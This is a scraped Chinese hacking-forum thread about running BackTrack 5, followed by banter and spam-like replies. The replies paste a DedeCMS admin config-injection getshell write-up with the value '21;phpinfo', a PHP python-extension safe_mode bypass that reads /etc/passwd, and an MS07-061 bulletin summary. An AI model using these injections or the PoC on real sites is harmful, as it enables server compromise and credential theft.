最近看过此主题的会员

返回列表 发帖

蛋疼,菊紧得我,折腾一晚上.

把BT5内核升级到3.1,安装了自己需要得软件。,装到移动硬盘上.



附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子

 

您可能还想看的主题:

Android系统再现木马,变身驱动程式袭击用户

Quick Heal Firewall Pro3.0

研究人员发现新型“无文件”恶意软件

U盘之家启动制作工具 /一键制作启动U盘/ 1.2 简体免费版

常用运行库 2011.9.09 纯净安装版

Virtual PC 2007 SP1(微软虚拟机)v6.0.192.0 汉化安装版

ESET ID自动获取器 1.2.0.9 官方绿色版

迅雷精简版(迅雷7官方精简版)下载v1.3.124绿色版

QQ农牧餐保姆v4.0.6 绿色去广告版

强力智能完美卸载各种软件Your Uninstaller V7.3.2011.4 绿色版

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小杨发表,本帖发表者小杨符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小杨和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

肉肉- -盘丝洞咩?

TOP

蛋疼啊,移动盘里面有没好东东,速度分享

TOP

回复 2# 笨蛋》活该


    两根网线,摆在那得,我懒得收拾了。

TOP

回复 3# xin0000


    好东西多着呢,拿你菊花来换。

TOP

呵呵呵呵··   学习学习!!

TOP

提示: 作者被禁止或删除 内容自动屏蔽

TOP

老了,,来围观一下就行了

TOP

老了,,来围观一下就行了

TOP

果然蛋疼

TOP

我不会玩这个软件。
你能入侵我的电脑。却进步了我的心。

TOP

来看看
兄弟们我来了

TOP

安全提醒:DEDECMS V5.7 SP2 后台取Getshell解析
dede/sys_info.php中
//保存配置的改动
if($dopost=="save")
{
    if(!isset($token)){
        echo 'No token found!';
        exit;
    }
    if(strcasecmp($token, $_SESSION['token']) != 0){
        echo 'Token mismatch!';
        exit;
    }
    foreach($_POST as $k=>$v)
    {
        if(preg_match("#^edit___#", $k))
        {
            $v = cn_substrR(${$k}, 1024);
        }
        else
        {
            continue;
        }
        $k = preg_replace("#^edit___#", "", $k);
        $dsql->ExecuteNoneQuery("UPDATE `#@__sysconfig` SET `value`='$v' WHERE varname='$k' ");
    }
    ReWriteConfig();
    ShowMsg("成功更改站点配置!", "sys_info.php");
    exit();
}

在选择更改配置后,通过foreach($_POST as $k=>$v)接受参数,并且将参数内容写入了数据库,之后进入ReWriteConfig();。
//更新配置函数
function ReWriteConfig()
{
    global $dsql,$configfile;
    if(!is_writeable($configfile))
    {
        echo "配置文件'{$configfile}'不支持写入,无法修改系统配置参数!";
        exit();
    }
    $fp = fopen($configfile,'w');
    flock($fp,3);
    fwrite($fp,"<"."?php
");
    $dsql->SetQuery("SELECT `varname`,`type`,`value`,`groupid` FROM `#@__sysconfig` ORDER BY aid ASC ");
    $dsql->Execute();
    while($row = $dsql->GetArray())
    {
        if($row['type']=='number')
        {
            if($row['value']=='') $row['value'] = 0;
            fwrite($fp,"${$row['varname']} = ".$row['value'].";
");
        }
        else
        {
            fwrite($fp,"${$row['varname']} = '".str_replace("'",'',$row['value'])."';
");
        }
    }
    fwrite($fp,"?".">");
    fclose($fp);
}

这里的代码将前面插入数据库的数据直接取出,没有再做验证。在while($row = $dsql->GetArray()),有两个分支,当$row['type']=='number'时,会往文件中直接写入,其他情况下会进行一次str_replace("'",'',$row['value'])将单引号替换掉。所以我们考虑使用第一个分支,选择一个默认为数字的参数。
比如使用参数cfg_ftp_port,它表示采用的ftp端口,



       



我们填入值为21;phpinfo



       



查看配置文件 data/config.cache.inc.php

       



















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

php python extension safe_mode 获取密码漏洞
<?php/*  php_python_bypass.php  php python extension safe_mode bypass  Amir Salmani - amir[at]salmani[dot]ir*///python ext. installed?if (!extension_loaded('python')) die("python extension is not installed
");//eval python code$res = python_eval('import ospwd = os.getcwd()print pwdos.system('cat /etc/passwd')');//show resultecho $res;?>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

MS07-061:Windows URI处理中的远程执行代码漏洞
发布日期: 十一月 13, 2007版本: 1.0
摘要
此更新可消除一个公开报告的漏洞。 Windows Shell 处理传递给它的特制 URI 的方式中存在一个远程执行代码漏洞。 如果 Windows Shell 没有充分验证这些 URI,则攻击者可能利用此漏洞并执行任意代码。 Microsoft 仅识别了在使用 Internet Explorer 7 的系统上利用此漏洞的方式。但是,Windows XP 和 Windows Server 2003 的所有受支持版本中包括的 Windows 文件 Shell32.dll 中存在该漏洞。
建议。 Microsoft 建议用户立即应用此更新。
受影响的软件
操作系统 最大安全影响 综合严重程度等级 此更新替代的公告 Windows XP Service Pack 2 远程执行代码 严重 MS06-045 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 x64 Edition 和 Windows 2003 Server x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) 远程执行代码 严重 MS06-045
不受影响的软件
操作系统 Microsoft Windows 2000 Service Pack 4 Windows Vista  Windows Vista x64
微软的安全公告:
http://www.microsoft.com/china/technet/security/bulletin/MS07-061.mspx
(以上链接均连到第三方网站)


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表